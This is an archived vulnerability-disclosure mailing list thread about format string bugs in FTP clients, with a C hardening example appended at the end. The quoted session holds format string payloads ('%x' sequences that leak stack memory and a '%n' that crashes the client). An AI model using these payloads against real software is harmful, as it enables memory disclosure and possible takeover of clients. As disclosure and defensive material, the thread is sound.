Vulnerability Development mailing list archives

[Ftp client , Format strings and SEGFAULTS]


From: KF <dotslash () snosoft com>
Date: Wed, 05 Dec 2001 12:51:22 -0500


These issues have been pointed out a number of times in the past... no
one has done anything about them. I think the last time this thread was
started up for the 20th time was about when the wu 2.6.1 site exec issue
came out... a number of people noticed the problem while testing their
own servers. These issues are present in a number of Linux ftp clients
... also in the Windows NT ftp.exe.
Theoretically a server could construct a malicious response to a site
quote command and maybe take control of the client... The issues with ls
are new obviously but it doesn't seem to me that vendors are hard
pressed on fixing client side ftp client issues.
-KF 



U dong-houn wrote:

 Have ever experienced such work before me.
 At that time, as well as Proftpd,
 by format string limitation that is found in wu-ftpd and so on, was  mistaking.
 It is that is client limitation that was stupid justly.

 Format string bug happens in ftp client by source.
 Can see this now.

 bash-2.04$ ftp 127.0.0.1
 Connected to 127.0.0.1.
 ...
 Name (127.0.0.1:x82): x82
 331 Password required for x82.
 Password:
 230 User x82 logged in.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ...
 ftp> site AAAA%x%x%x%x%x%x%x%x%x%x
 500 'SITE AAAA806C1A527FA805164828057650BFFFE9C4BFFFC190455449534141412025782541' not understood.

 ftp> quote AAAA%x%x%x%x%x%x%x%x%x%x
 500 AAAA806C1A627FF805164828057650BFFFE9C4BFFFC190414141417825782578257825 not understood.

 ftp> site AAAA%x%x%x%x%x%x%x%x%n
 Segmentation fault (core dumped)
 bash-2.04$

 Stupid ftp client program may have to be re-formed.
 Desire there is no mistake ...
 If use a debugging tool, can see that have been expired in client.

 --

 by Xpl017Elz

 P.S: Always so ...
      Sorry. I gave up original English.
      Study English since next time. So, make understood other people.
      Thank you for reading unwise writing. ^-^*

--

Powered by Outblaze
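
An added example, not code from this thread or from any FTP client: assuming the client hands the text typed after `site` or `quote` to a printf-style send routine as the format string (the thread does not show the client source), this shows the hardened call and a check that the conversions reach the wire as plain text. `send_command`, `send_site`, `count_conversions` and the `wire` buffer are hypothetical names.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

static char wire[256];  /* stands in for the control connection (assumption) */

/* Hypothetical printf-style send helper. The format attribute lets gcc and
 * clang flag non-literal formats at call sites with -Wformat-security. */
int send_command(const char *fmt, ...) __attribute__((format(printf, 1, 2)));

int send_command(const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(wire, sizeof wire, fmt, ap);
    va_end(ap);
    /* -1: formatting failed or the command did not fit; caller must not send */
    return (n < 0 || (size_t)n >= sizeof wire) ? -1 : n;
}

/* Pattern consistent with the session above (comment only, not compiled):
 *     send_command(user_line);    user text is parsed as the format
 * Hardened form: user text is only ever an argument to a constant format. */
int send_site(const char *user_arg)
{
    return send_command("SITE %s", user_arg);
}

/* Count printf conversions in a string; "%%" is a literal percent sign. */
size_t count_conversions(const char *s)
{
    size_t count = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%')
            s++;                /* skip the escaped percent sign */
        else if (s[1] != '\0')
            count++;
    }
    return count;
}

int main(void)
{
    int n = send_site("AAAA%x%x%x%x%x%x%x%x%n");  /* input from the session */
    printf("%d bytes: %s (%zu conversions left as text)\n", n, wire, count_conversions(wire));
    return 0;
}
```

Building with `-Wformat -Wformat-security` makes gcc and clang warn on any remaining call that passes a non-literal string as the format.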

